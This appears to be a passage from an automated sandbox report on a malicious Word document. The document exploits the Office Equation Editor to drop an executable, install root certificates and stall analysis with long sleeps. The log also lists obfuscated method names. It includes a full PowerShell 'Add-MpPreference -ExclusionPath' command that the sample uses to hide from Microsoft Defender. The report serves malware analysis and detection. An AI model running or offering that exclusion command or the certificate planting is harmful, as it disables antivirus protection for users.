Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_005D6ACC push esi; ret 2_2_005D6B2B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_005CA6CE push ecx; iretd 2_2_005CA6CF
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_005D6ACA push esi; ret 2_2_005D6ACB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_005C01F4 push eax; retf 2_2_005C01F5
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_005D448F push esp; ret 2_2_005D4493
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_005CC288 pushad ; retn 005Ch 2_2_005CC289
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_005D66B0 push esp; ret 2_2_005D66B3
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_005D66AA push esp; ret 2_2_005D66AB
Source: FcdBUj68lnCbMtB[1].exe.2.dr | Static PE information: section name: .text entropy: 7.956474075976922
Source: obie8920193.exe.2.dr | Static PE information: section name: .text entropy: 7.956474075976922
Source: 5.2.obie8920193.exe.38e9930.9.raw.unpack, zSxtCKQlluoBoaYfXp.cs | High entropy of concatenated method names: 'OgnRHMcNY5', 'vmCRol41YF', 'Q0uR2RhZuy', 'zMfRufRBTY', 'fpcRpi2xKw', 'v75RKhYLrv', 'xsjRB7Mp23', 'tHcRw0kPul', 'KRLRIlCq1d', 'dSiRnK2hl9'
Source: 5.2.obie8920193.exe.38e9930.9.raw.unpack, Oas0CkJLP86ncCAk06.cs | High entropy of concatenated method names: 'GHXsAR4r9S', 'lAmsvvVNPG', 'Exds8tG6SW', 'MXGsLTh54W', 'NsusdBgHPI', 'dJas3JNOwr', 'aNBuvWuf7Q8RLhOWve', 'uQ7NenzmOOxcAaLMhk', 'OFfsskh2oO', 'BfAsOteMOw'
Source: 5.2.obie8920193.exe.38e9930.9.raw.unpack, XknLE6sxi0AB9TbxvRc.cs | High entropy of concatenated method names: 'AvfTq0KEyq', 's2yTau8oC7', 'RVqTjUFaYj', 'JoMTrHMPda', 'ob9TENcOTb', 'Sw1TXwCJZ4', 'i8GTN75a3E', 'rAPTHHC7Ww', 'fiEToqdgIj', 'joyT7tuXVm'
Source: 5.2.obie8920193.exe.38e9930.9.raw.unpack, dvDQ8ooxdtG6SWtXGT.cs | High entropy of concatenated method names: 'ERH1rLd988', 'bAw1XTpBDV', 'TKy1HTUH7d', 'eTd1oLjbdV', 'MbZ1d3XUIw', 'sYC13oI7Up', 'EbH10oYBSs', 'boA1Vv6yAi', 'At71TxKAYD', 'm9C1ilIAyy'
Source: 5.2.obie8920193.exe.38e9930.9.raw.unpack, GgKL0Eg5Wkhg2YdC0x.cs | High entropy of concatenated method names: 'IMUTsrQsXJ', 'VeJTOl1CHT', 'TQwTJrpikx', 'GkjTcaLa5u', 'c4yTyTFN2J', 'U8pTkEyOuX', 'PAFTe40vsK', 'qkTVPe19PJ', 'rcVV5qJaJJ', 'lnEVSLrVM4'
Source: 5.2.obie8920193.exe.38e9930.9.raw.unpack, yT6mC6B4fPpfSn1yjG.cs | High entropy of concatenated method names: 'xUhAc6V83P', 'eEaA1XNMYI', 'vbPAeCfRB2', 'bf6egCAcCi', 'aaEez3V0VO', 'dNJAxUGX5V', 'I3nAshrl2E', 'f6kAfxi46V', 'W7dAOc3oni', 'rkiAJx0XHx'
Source: 5.2.obie8920193.exe.38e9930.9.raw.unpack, DPIJJa2JNOwrGoKDAd.cs | High entropy of concatenated method names: 'k3VeWEg6BE', 'jlAeyDgLZW', 'oERekrBOhj', 'TPqeATLDUt', 'e1IevGOKTQ', 'o1VkbBmDax', 'v5RklZ0XhA', 'Ib5kPvxGsJ', 'xGwk5B7rx1', 'FT7kSu5fbr'
Source: 5.2.obie8920193.exe.38e9930.9.raw.unpack, BR4r9SHUAmvVNPGE5t.cs | High entropy of concatenated method names: 'FgWyYS2u0Z', 'AUoyDCKohK', 'vqCyGtCJo4', 'dfey4gBG0p', 'N7aybp4Wuk', 'Iliylj9Q2S', 'L2TyPGrsds', 'e99y5cS2Pg', 'RDoySsTIjB', 'WiCygTnkPk'
Source: 5.2.obie8920193.exe.38e9930.9.raw.unpack, C7Kf5VfB7dASIKDlYf.cs | High entropy of concatenated method names: 'WBVjLQXbf', 'A6nrrJFfH', 'VecXbIrwB', 'LiCN7U1wD', 'EMeoq1cM7', 'Nko77COJB', 'q3X0Zl8iJKdf9jL3mN', 'xfGhmsBIc8kpAyH0kO', 'kHtpQYeZjoIwjqoCkF', 'p5HV4Vvjf'
Source: 5.2.obie8920193.exe.38e9930.9.raw.unpack, w54Wwi7tk9esttsuBg.cs | High entropy of concatenated method names: 'dddkE0mrXt', 'i5ukNS9Ijc', 'T3l1FXYGRg', 'Vma1pu6KWc', 'tEx1KV0sPo', 'zRM16k4Mwx', 'OmO1BYfUCQ', 'NEY1wE7i8E', 'awT1tqXV4E', 'qyv1IfBOkj'
Source: 5.2.obie8920193.exe.38e9930.9.raw.unpack, va4sUbS6hEyNbApReb.cs | High entropy of concatenated method names: 'GK6V2twI8t', 'KomVumiTnw', 'DuAVFIexMn', 'BiXVpFkQn2', 'BfMVYVSBtn', 'BrLVKFywPE', 'Next', 'Next', 'Next', 'NextBytes'
Source: 5.2.obie8920193.exe.38e9930.9.raw.unpack, D2UDibly6dG7h6hnQq.cs | High entropy of concatenated method names: 'qEM05aRK20', 'Jm50gVOZQq', 'dpiVxjpehW', 'EO9Vsf6VXr', 'qMg0nfFZL0', 'kg10MuDH94', 'pqX0Q7KhQy', 'yga0YAW9bd', 'heB0DashSd', 'QQ30Gj3wYg'
Source: 5.2.obie8920193.exe.38e9930.9.raw.unpack, Qh9yHxsORTqQFMRRqnU.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'fSCiYQdVqD', 'UCniDDVHuV', 'Bl9iGAQae4', 'XvLi4Ll8CB', 'jbQibeWikE', 'agFilOQRxC', 'rW0iP7byWG'
Source: 5.2.obie8920193.exe.38e9930.9.raw.unpack, KGQivG4jZoZqi3K2bp.cs | High entropy of concatenated method names: 'zuv08FCj4y', 'iP30LA7YEU', 'ToString', 'p8H0cQJaMf', 'vYL0yc0pPe', 'JEW01mIA5Y', 'xkm0kn33Gr', 'aRs0e4HrQH', 'FJZ0ALR5Py', 'x8Y0vqeFMS'
Source: 5.2.obie8920193.exe.38e9930.9.raw.unpack, W69GQbvchlGWfxEUg3.cs | High entropy of concatenated method names: 'knpOW5nIkU', 'rnCOcoFLu2', 'cTTOyyqFQy', 'qx0O17hsB9', 'Eo6OkBIRGy', 'p1uOelR80E', 'oSAOABkX4v', 'd1COv3GXRm', 'N9cOUPVVkK', 'OjGO8VCNo1'
Source: 5.2.obie8920193.exe.38e9930.9.raw.unpack, c8JUhb5EhV7YevbYMr.cs | High entropy of concatenated method names: 'i5qVciT2dm', 'Hd1VyKoPxa', 'cQiV10G2cQ', 'lYCVkiAPpq', 'pFaVeO1J9R', 'VmmVAKd6jx', 'hgiVvYdhpx', 'UrQVUhBGda', 'mh7V8FlQJC', 'h1qVLkD56K'
Source: 5.2.obie8920193.exe.38e9930.9.raw.unpack, xUxCqCtuE8HCR9gjRX.cs | High entropy of concatenated method names: 'jnCAquX9FD', 'yXqAaV2sHl', 'amTAjCiVrt', 'o8xAryFFEy', 'KvSAEZi7gl', 'bdLAXlHIK5', 'wxkANeL5SP', 'ye8AH5d9Rt', 'DWCAoxP72I', 'X6IA7DsCAp'
Source: 5.2.obie8920193.exe.38e9930.9.raw.unpack, sM5uBfyrWcuZmGJ521.cs | High entropy of concatenated method names: 'Dispose', 'J1lsSfCwkJ', 'Lwffud1nQM', 'piCUUZtDJ4', 'Mf8sgJUhbE', 'xV7szYevbY', 'ProcessDialogKey', 'Prmfxa4sUb', 'KhEfsyNbAp', 'oebff2gKL0'
Source: 5.2.obie8920193.exe.38e9930.9.raw.unpack, kQMY18YRSxSjPa7Enu.cs | High entropy of concatenated method names: 'qfsdIkUpHl', 'NJNdMENith', 'MW9dYsIKP3', 'k3gdDvQLC7', 'uutdu4L8XF', 'kcddFDdQy7', 'g2OdpWitoC', 'JNNdKxghd0', 'lvCd6ru4f4', 'ArHdBrRQmR'
Source: 5.2.obie8920193.exe.4ea0000.12.raw.unpack, zSxtCKQlluoBoaYfXp.cs | High entropy of concatenated method names: 'OgnRHMcNY5', 'vmCRol41YF', 'Q0uR2RhZuy', 'zMfRufRBTY', 'fpcRpi2xKw', 'v75RKhYLrv', 'xsjRB7Mp23', 'tHcRw0kPul', 'KRLRIlCq1d', 'dSiRnK2hl9'
Source: 5.2.obie8920193.exe.4ea0000.12.raw.unpack, Oas0CkJLP86ncCAk06.cs | High entropy of concatenated method names: 'GHXsAR4r9S', 'lAmsvvVNPG', 'Exds8tG6SW', 'MXGsLTh54W', 'NsusdBgHPI', 'dJas3JNOwr', 'aNBuvWuf7Q8RLhOWve', 'uQ7NenzmOOxcAaLMhk', 'OFfsskh2oO', 'BfAsOteMOw'
Source: 5.2.obie8920193.exe.4ea0000.12.raw.unpack, XknLE6sxi0AB9TbxvRc.cs | High entropy of concatenated method names: 'AvfTq0KEyq', 's2yTau8oC7', 'RVqTjUFaYj', 'JoMTrHMPda', 'ob9TENcOTb', 'Sw1TXwCJZ4', 'i8GTN75a3E', 'rAPTHHC7Ww', 'fiEToqdgIj', 'joyT7tuXVm'
Source: 5.2.obie8920193.exe.4ea0000.12.raw.unpack, dvDQ8ooxdtG6SWtXGT.cs | High entropy of concatenated method names: 'ERH1rLd988', 'bAw1XTpBDV', 'TKy1HTUH7d', 'eTd1oLjbdV', 'MbZ1d3XUIw', 'sYC13oI7Up', 'EbH10oYBSs', 'boA1Vv6yAi', 'At71TxKAYD', 'm9C1ilIAyy'
Source: 5.2.obie8920193.exe.4ea0000.12.raw.unpack, GgKL0Eg5Wkhg2YdC0x.cs | High entropy of concatenated method names: 'IMUTsrQsXJ', 'VeJTOl1CHT', 'TQwTJrpikx', 'GkjTcaLa5u', 'c4yTyTFN2J', 'U8pTkEyOuX', 'PAFTe40vsK', 'qkTVPe19PJ', 'rcVV5qJaJJ', 'lnEVSLrVM4'
Source: 5.2.obie8920193.exe.4ea0000.12.raw.unpack, yT6mC6B4fPpfSn1yjG.cs | High entropy of concatenated method names: 'xUhAc6V83P', 'eEaA1XNMYI', 'vbPAeCfRB2', 'bf6egCAcCi', 'aaEez3V0VO', 'dNJAxUGX5V', 'I3nAshrl2E', 'f6kAfxi46V', 'W7dAOc3oni', 'rkiAJx0XHx'
Source: 5.2.obie8920193.exe.4ea0000.12.raw.unpack, DPIJJa2JNOwrGoKDAd.cs | High entropy of concatenated method names: 'k3VeWEg6BE', 'jlAeyDgLZW', 'oERekrBOhj', 'TPqeATLDUt', 'e1IevGOKTQ', 'o1VkbBmDax', 'v5RklZ0XhA', 'Ib5kPvxGsJ', 'xGwk5B7rx1', 'FT7kSu5fbr'
Source: 5.2.obie8920193.exe.4ea0000.12.raw.unpack, BR4r9SHUAmvVNPGE5t.cs | High entropy of concatenated method names: 'FgWyYS2u0Z', 'AUoyDCKohK', 'vqCyGtCJo4', 'dfey4gBG0p', 'N7aybp4Wuk', 'Iliylj9Q2S', 'L2TyPGrsds', 'e99y5cS2Pg', 'RDoySsTIjB', 'WiCygTnkPk'
Source: 5.2.obie8920193.exe.4ea0000.12.raw.unpack, C7Kf5VfB7dASIKDlYf.cs | High entropy of concatenated method names: 'WBVjLQXbf', 'A6nrrJFfH', 'VecXbIrwB', 'LiCN7U1wD', 'EMeoq1cM7', 'Nko77COJB', 'q3X0Zl8iJKdf9jL3mN', 'xfGhmsBIc8kpAyH0kO', 'kHtpQYeZjoIwjqoCkF', 'p5HV4Vvjf'
Source: 5.2.obie8920193.exe.4ea0000.12.raw.unpack, w54Wwi7tk9esttsuBg.cs | High entropy of concatenated method names: 'dddkE0mrXt', 'i5ukNS9Ijc', 'T3l1FXYGRg', 'Vma1pu6KWc', 'tEx1KV0sPo', 'zRM16k4Mwx', 'OmO1BYfUCQ', 'NEY1wE7i8E', 'awT1tqXV4E', 'qyv1IfBOkj'
Source: 5.2.obie8920193.exe.4ea0000.12.raw.unpack, va4sUbS6hEyNbApReb.cs | High entropy of concatenated method names: 'GK6V2twI8t', 'KomVumiTnw', 'DuAVFIexMn', 'BiXVpFkQn2', 'BfMVYVSBtn', 'BrLVKFywPE', 'Next', 'Next', 'Next', 'NextBytes'
Source: 5.2.obie8920193.exe.4ea0000.12.raw.unpack, D2UDibly6dG7h6hnQq.cs | High entropy of concatenated method names: 'qEM05aRK20', 'Jm50gVOZQq', 'dpiVxjpehW', 'EO9Vsf6VXr', 'qMg0nfFZL0', 'kg10MuDH94', 'pqX0Q7KhQy', 'yga0YAW9bd', 'heB0DashSd', 'QQ30Gj3wYg'
Source: 5.2.obie8920193.exe.4ea0000.12.raw.unpack, Qh9yHxsORTqQFMRRqnU.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'fSCiYQdVqD', 'UCniDDVHuV', 'Bl9iGAQae4', 'XvLi4Ll8CB', 'jbQibeWikE', 'agFilOQRxC', 'rW0iP7byWG'
Source: 5.2.obie8920193.exe.4ea0000.12.raw.unpack, KGQivG4jZoZqi3K2bp.cs | High entropy of concatenated method names: 'zuv08FCj4y', 'iP30LA7YEU', 'ToString', 'p8H0cQJaMf', 'vYL0yc0pPe', 'JEW01mIA5Y', 'xkm0kn33Gr', 'aRs0e4HrQH', 'FJZ0ALR5Py', 'x8Y0vqeFMS'
Source: 5.2.obie8920193.exe.4ea0000.12.raw.unpack, W69GQbvchlGWfxEUg3.cs | High entropy of concatenated method names: 'knpOW5nIkU', 'rnCOcoFLu2', 'cTTOyyqFQy', 'qx0O17hsB9', 'Eo6OkBIRGy', 'p1uOelR80E', 'oSAOABkX4v', 'd1COv3GXRm', 'N9cOUPVVkK', 'OjGO8VCNo1'
Source: 5.2.obie8920193.exe.4ea0000.12.raw.unpack, c8JUhb5EhV7YevbYMr.cs | High entropy of concatenated method names: 'i5qVciT2dm', 'Hd1VyKoPxa', 'cQiV10G2cQ', 'lYCVkiAPpq', 'pFaVeO1J9R', 'VmmVAKd6jx', 'hgiVvYdhpx', 'UrQVUhBGda', 'mh7V8FlQJC', 'h1qVLkD56K'
Source: 5.2.obie8920193.exe.4ea0000.12.raw.unpack, xUxCqCtuE8HCR9gjRX.cs | High entropy of concatenated method names: 'jnCAquX9FD', 'yXqAaV2sHl', 'amTAjCiVrt', 'o8xAryFFEy', 'KvSAEZi7gl', 'bdLAXlHIK5', 'wxkANeL5SP', 'ye8AH5d9Rt', 'DWCAoxP72I', 'X6IA7DsCAp'
Source: 5.2.obie8920193.exe.4ea0000.12.raw.unpack, sM5uBfyrWcuZmGJ521.cs | High entropy of concatenated method names: 'Dispose', 'J1lsSfCwkJ', 'Lwffud1nQM', 'piCUUZtDJ4', 'Mf8sgJUhbE', 'xV7szYevbY', 'ProcessDialogKey', 'Prmfxa4sUb', 'KhEfsyNbAp', 'oebff2gKL0'
Source: 5.2.obie8920193.exe.4ea0000.12.raw.unpack, kQMY18YRSxSjPa7Enu.cs | High entropy of concatenated method names: 'qfsdIkUpHl', 'NJNdMENith', 'MW9dYsIKP3', 'k3gdDvQLC7', 'uutdu4L8XF', 'kcddFDdQy7', 'g2OdpWitoC', 'JNNdKxghd0', 'lvCd6ru4f4', 'ArHdBrRQmR'
Source: 5.2.obie8920193.exe.3887310.11.raw.unpack, zSxtCKQlluoBoaYfXp.cs | High entropy of concatenated method names: 'OgnRHMcNY5', 'vmCRol41YF', 'Q0uR2RhZuy', 'zMfRufRBTY', 'fpcRpi2xKw', 'v75RKhYLrv', 'xsjRB7Mp23', 'tHcRw0kPul', 'KRLRIlCq1d', 'dSiRnK2hl9'
Source: 5.2.obie8920193.exe.3887310.11.raw.unpack, Oas0CkJLP86ncCAk06.cs | High entropy of concatenated method names: 'GHXsAR4r9S', 'lAmsvvVNPG', 'Exds8tG6SW', 'MXGsLTh54W', 'NsusdBgHPI', 'dJas3JNOwr', 'aNBuvWuf7Q8RLhOWve', 'uQ7NenzmOOxcAaLMhk', 'OFfsskh2oO', 'BfAsOteMOw'
Source: 5.2.obie8920193.exe.3887310.11.raw.unpack, XknLE6sxi0AB9TbxvRc.cs | High entropy of concatenated method names: 'AvfTq0KEyq', 's2yTau8oC7', 'RVqTjUFaYj', 'JoMTrHMPda', 'ob9TENcOTb', 'Sw1TXwCJZ4', 'i8GTN75a3E', 'rAPTHHC7Ww', 'fiEToqdgIj', 'joyT7tuXVm'
Source: 5.2.obie8920193.exe.3887310.11.raw.unpack, dvDQ8ooxdtG6SWtXGT.cs | High entropy of concatenated method names: 'ERH1rLd988', 'bAw1XTpBDV', 'TKy1HTUH7d', 'eTd1oLjbdV', 'MbZ1d3XUIw', 'sYC13oI7Up', 'EbH10oYBSs', 'boA1Vv6yAi', 'At71TxKAYD', 'm9C1ilIAyy'
Source: 5.2.obie8920193.exe.3887310.11.raw.unpack, GgKL0Eg5Wkhg2YdC0x.cs | High entropy of concatenated method names: 'IMUTsrQsXJ', 'VeJTOl1CHT', 'TQwTJrpikx', 'GkjTcaLa5u', 'c4yTyTFN2J', 'U8pTkEyOuX', 'PAFTe40vsK', 'qkTVPe19PJ', 'rcVV5qJaJJ', 'lnEVSLrVM4'
Source: 5.2.obie8920193.exe.3887310.11.raw.unpack, yT6mC6B4fPpfSn1yjG.cs | High entropy of concatenated method names: 'xUhAc6V83P', 'eEaA1XNMYI', 'vbPAeCfRB2', 'bf6egCAcCi', 'aaEez3V0VO', 'dNJAxUGX5V', 'I3nAshrl2E', 'f6kAfxi46V', 'W7dAOc3oni', 'rkiAJx0XHx'
Source: 5.2.obie8920193.exe.3887310.11.raw.unpack, DPIJJa2JNOwrGoKDAd.cs | High entropy of concatenated method names: 'k3VeWEg6BE', 'jlAeyDgLZW', 'oERekrBOhj', 'TPqeATLDUt', 'e1IevGOKTQ', 'o1VkbBmDax', 'v5RklZ0XhA', 'Ib5kPvxGsJ', 'xGwk5B7rx1', 'FT7kSu5fbr'
Source: 5.2.obie8920193.exe.3887310.11.raw.unpack, BR4r9SHUAmvVNPGE5t.cs | High entropy of concatenated method names: 'FgWyYS2u0Z', 'AUoyDCKohK', 'vqCyGtCJo4', 'dfey4gBG0p', 'N7aybp4Wuk', 'Iliylj9Q2S', 'L2TyPGrsds', 'e99y5cS2Pg', 'RDoySsTIjB', 'WiCygTnkPk'
Source: 5.2.obie8920193.exe.3887310.11.raw.unpack, C7Kf5VfB7dASIKDlYf.cs | High entropy of concatenated method names: 'WBVjLQXbf', 'A6nrrJFfH', 'VecXbIrwB', 'LiCN7U1wD', 'EMeoq1cM7', 'Nko77COJB', 'q3X0Zl8iJKdf9jL3mN', 'xfGhmsBIc8kpAyH0kO', 'kHtpQYeZjoIwjqoCkF', 'p5HV4Vvjf'
Source: 5.2.obie8920193.exe.3887310.11.raw.unpack, w54Wwi7tk9esttsuBg.cs | High entropy of concatenated method names: 'dddkE0mrXt', 'i5ukNS9Ijc', 'T3l1FXYGRg', 'Vma1pu6KWc', 'tEx1KV0sPo', 'zRM16k4Mwx', 'OmO1BYfUCQ', 'NEY1wE7i8E', 'awT1tqXV4E', 'qyv1IfBOkj'
Source: 5.2.obie8920193.exe.3887310.11.raw.unpack, va4sUbS6hEyNbApReb.cs | High entropy of concatenated method names: 'GK6V2twI8t', 'KomVumiTnw', 'DuAVFIexMn', 'BiXVpFkQn2', 'BfMVYVSBtn', 'BrLVKFywPE', 'Next', 'Next', 'Next', 'NextBytes'
Source: 5.2.obie8920193.exe.3887310.11.raw.unpack, D2UDibly6dG7h6hnQq.cs | High entropy of concatenated method names: 'qEM05aRK20', 'Jm50gVOZQq', 'dpiVxjpehW', 'EO9Vsf6VXr', 'qMg0nfFZL0', 'kg10MuDH94', 'pqX0Q7KhQy', 'yga0YAW9bd', 'heB0DashSd', 'QQ30Gj3wYg'
Source: 5.2.obie8920193.exe.3887310.11.raw.unpack, Qh9yHxsORTqQFMRRqnU.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'fSCiYQdVqD', 'UCniDDVHuV', 'Bl9iGAQae4', 'XvLi4Ll8CB', 'jbQibeWikE', 'agFilOQRxC', 'rW0iP7byWG'
Source: 5.2.obie8920193.exe.3887310.11.raw.unpack, KGQivG4jZoZqi3K2bp.cs | High entropy of concatenated method names: 'zuv08FCj4y', 'iP30LA7YEU', 'ToString', 'p8H0cQJaMf', 'vYL0yc0pPe', 'JEW01mIA5Y', 'xkm0kn33Gr', 'aRs0e4HrQH', 'FJZ0ALR5Py', 'x8Y0vqeFMS'
Source: 5.2.obie8920193.exe.3887310.11.raw.unpack, W69GQbvchlGWfxEUg3.cs | High entropy of concatenated method names: 'knpOW5nIkU', 'rnCOcoFLu2', 'cTTOyyqFQy', 'qx0O17hsB9', 'Eo6OkBIRGy', 'p1uOelR80E', 'oSAOABkX4v', 'd1COv3GXRm', 'N9cOUPVVkK', 'OjGO8VCNo1'
Source: 5.2.obie8920193.exe.3887310.11.raw.unpack, c8JUhb5EhV7YevbYMr.cs | High entropy of concatenated method names: 'i5qVciT2dm', 'Hd1VyKoPxa', 'cQiV10G2cQ', 'lYCVkiAPpq', 'pFaVeO1J9R', 'VmmVAKd6jx', 'hgiVvYdhpx', 'UrQVUhBGda', 'mh7V8FlQJC', 'h1qVLkD56K'
Source: 5.2.obie8920193.exe.3887310.11.raw.unpack, xUxCqCtuE8HCR9gjRX.cs | High entropy of concatenated method names: 'jnCAquX9FD', 'yXqAaV2sHl', 'amTAjCiVrt', 'o8xAryFFEy', 'KvSAEZi7gl', 'bdLAXlHIK5', 'wxkANeL5SP', 'ye8AH5d9Rt', 'DWCAoxP72I', 'X6IA7DsCAp'
Source: 5.2.obie8920193.exe.3887310.11.raw.unpack, sM5uBfyrWcuZmGJ521.cs | High entropy of concatenated method names: 'Dispose', 'J1lsSfCwkJ', 'Lwffud1nQM', 'piCUUZtDJ4', 'Mf8sgJUhbE', 'xV7szYevbY', 'ProcessDialogKey', 'Prmfxa4sUb', 'KhEfsyNbAp', 'oebff2gKL0'
Source: 5.2.obie8920193.exe.3887310.11.raw.unpack, kQMY18YRSxSjPa7Enu.cs | High entropy of concatenated method names: 'qfsdIkUpHl', 'NJNdMENith', 'MW9dYsIKP3', 'k3gdDvQLC7', 'uutdu4L8XF', 'kcddFDdQy7', 'g2OdpWitoC', 'JNNdKxghd0', 'lvCd6ru4f4', 'ArHdBrRQmR'

            Persistence and Installation Behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Roaming\obie8920193.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\FcdBUj68lnCbMtB[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe Memory allocated: 1C0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe Memory allocated: 2570000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe Memory allocated: 8010000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe Memory allocated: 54B0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe Memory allocated: 9010000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe Memory allocated: 58B0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe Memory allocated: 3C0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe Memory allocated: 2230000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe Memory allocated: 5E0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe Thread delayed: delay time: 600000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2933
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1409
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe Window / User API: threadDelayed 9721
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1764 Thread sleep time: -180000s >= -30000s
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe TID: 3172 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3380 Thread sleep time: -120000s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3392 Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3348 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe TID: 3384 Thread sleep time: -60000s >= -30000s
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe TID: 3416 Thread sleep time: -11068046444225724s >= -30000s
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe TID: 3416 Thread sleep time: -600000s >= -30000s
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe TID: 3420 Thread sleep count: 92 > 30
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe TID: 3420 Thread sleep count: 9721 > 30
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3500 Thread sleep time: -120000s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe Code function: 7_2_003CFCB8 LdrInitializeThunk,7_2_003CFCB8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe Process token adjusted: Debug
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\AppData\Roaming\obie8920193.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obie8920193.exe"
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe Memory written: C:\Users\user\AppData\Roaming\obie8920193.exe base: 400000 value starts with: 4D5A
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\obie8920193.exe "C:\Users\user\AppData\Roaming\obie8920193.exe"
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obie8920193.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess created: C:\Users\user\AppData\Roaming\obie8920193.exe "C:\Users\user\AppData\Roaming\obie8920193.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeQueries volume information: C:\Users\user\AppData\Roaming\obie8920193.exe VolumeInformationJump to behavior
